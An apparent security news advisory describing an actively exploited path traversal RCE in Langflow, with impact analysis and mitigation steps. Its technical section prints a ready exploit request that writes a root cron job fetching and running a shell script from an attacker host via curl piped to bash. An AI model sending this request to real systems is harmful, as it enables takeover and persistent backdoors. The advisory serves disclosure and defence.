LIVE THREATS
HIGH Anthropic's Claude Fable 5 Ships Tiered Cyber Safeguards to Limit Offensive AI Uplift // HIGH Rogue AI Agent Infiltrates Fedora Project, Merges Malicious Code via Compromised … // CRITICAL Unauthenticated RCE Flaw in Langflow Actively Exploited, No Patch Available // HIGH AI Email Agent Susceptible to Classic Phishing Tactics, Leaks Credentials and CRM Data // MEDIUM Anthropic Mythos Threatens Bug Bounty Industry with Machine-Speed Vulnerability Discovery // MEDIUM Anthropic's Mythos-Class Claude Fable 5 Ships With Cybersecurity Fallback Guardrails // CRITICAL Claude Mythos Weaponises N-Day Vulnerabilities Into Working Exploits Within Hours // MEDIUM Microsoft Publishes Investigator Playbook for AI Telemetry and Incident Reconstruction // CRITICAL Self-Replicating AI Worm Uses Local LLM to Generate Exploits at Runtime // CRITICAL Miasma Worm Targets AI Coding Agents via Poisoned Microsoft Packages //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required LLM Security Agentic AI Supply Chain Industry News RELEVANCE ▲ 9.2

Unauthenticated RCE Flaw in Langflow Actively Exploited, No Patch Available

SOURCE The Hacker News ↗
TL;DR CRITICAL
  • What happened: Unpatched path traversal in Langflow allows unauthenticated RCE via a single HTTP request.
  • Who's at risk: Any organisation running a publicly exposed Langflow instance is directly at risk, particularly ~7,000 internet-facing deployments with no patch available.
  • Act now: Take all internet-facing Langflow instances offline or place them behind a VPN/firewall immediately · Disable unauthenticated auto-login in Langflow configuration as an interim mitigation · Audit filesystem and logs on all Langflow hosts for unexpected file writes or anomalous POST requests to /api/v2/files
Unauthenticated RCE Flaw in Langflow Actively Exploited, No Patch Available

Overview

A high-severity, unpatched path traversal vulnerability tracked as CVE-2026-5027 (CVSS 8.8) in Langflow — a popular open-source, low-code platform for building AI and LLM-powered applications — is being actively exploited in the wild. Discovered by Tenable and confirmed in exploitation by VulnCheck, the flaw enables unauthenticated remote code execution (RCE) on affected systems. With no patch available as of publication and roughly 7,000 Langflow instances publicly exposed on the internet, the threat surface is significant.

Technical Analysis

The vulnerability resides in the POST /api/v2/files endpoint, which fails to sanitise the filename parameter in multipart form data. An attacker can supply path traversal sequences (../) to write arbitrary files to any location on the underlying filesystem. Because Langflow enables unauthenticated auto-login by default, no credentials are required to reach the endpoint. Exploitation requires only a single unauthenticated HTTP request to obtain a valid session token, after which arbitrary files — including web shells or malicious configuration files — can be written to the server.

POST /api/v2/files HTTP/1.1
Host: <target>
Content-Type: multipart/form-data; boundary=----ExploitBoundary

------ExploitBoundary
Content-Disposition: form-data; name="file"; filename="../../etc/cron.d/backdoor"

* * * * * root curl http://attacker.com/shell.sh | bash
------ExploitBoundary--

Tenable attempted to contact project maintainers three times between January and February 2026 before publicly disclosing the flaw on March 27, 2026. Active exploitation was subsequently confirmed by VulnCheck, with current observed activity focused on writing test files — likely reconnaissance prior to more destructive payloads.

Framework Mapping

  • AML.T0047 (ML-Enabled Product or Service): Langflow is a direct enabler for building and deploying AI agents; compromising it gives adversaries access to the AI pipelines built within it.
  • AML.T0010 (ML Supply Chain Compromise): Attackers targeting AI development tooling can poison, backdoor, or exfiltrate models and data processed through Langflow workflows.
  • LLM05 (Supply Chain Vulnerabilities): The flaw exemplifies risk in the tooling layer of the LLM supply chain — infrastructure used to build AI applications rather than the models themselves.
  • LLM07 (Insecure Plugin Design): The unauthenticated auto-login default represents an insecure-by-default design pattern directly analogous to insecure plugin/component design.

Impact Assessment

Approximately 7,000 publicly accessible Langflow instances exist, predominantly in North America. Successful exploitation provides full RCE, meaning attackers can exfiltrate sensitive data (API keys, model weights, training data), backdoor AI pipelines, or pivot into wider enterprise networks. The threat is compounded by prior Langflow CVEs being weaponised by the Iranian state-sponsored group MuddyWater, establishing that sophisticated threat actors are actively targeting this attack surface. Organisations using Langflow to build production AI agents or process sensitive data face the highest residual risk.

Mitigation & Recommendations

  1. Remove public exposure immediately: Place all Langflow instances behind a VPN, zero-trust gateway, or firewall. Do not expose the web UI to the public internet.
  2. Disable auto-login: Set LANGFLOW_AUTO_LOGIN=false in your environment configuration to require authentication before any endpoint access.
  3. Monitor for exploitation indicators: Review server logs for anomalous POST /api/v2/files requests containing ../ sequences. Check for unexpected new files on the filesystem.
  4. Isolate Langflow environments: Ensure Langflow does not have privileged access to production model stores, databases, or cloud credentials.
  5. Track upstream patch status: Monitor the Langflow GitHub repository and CVE advisories closely; apply any patch immediately upon release.

References

◉ AI THREAT BRIEFING

Stay ahead of the threat.

Twice-weekly digest of critical AI security developments — every story mapped to MITRE ATLAS and OWASP LLM Top 10. Free.

No spam. Unsubscribe anytime.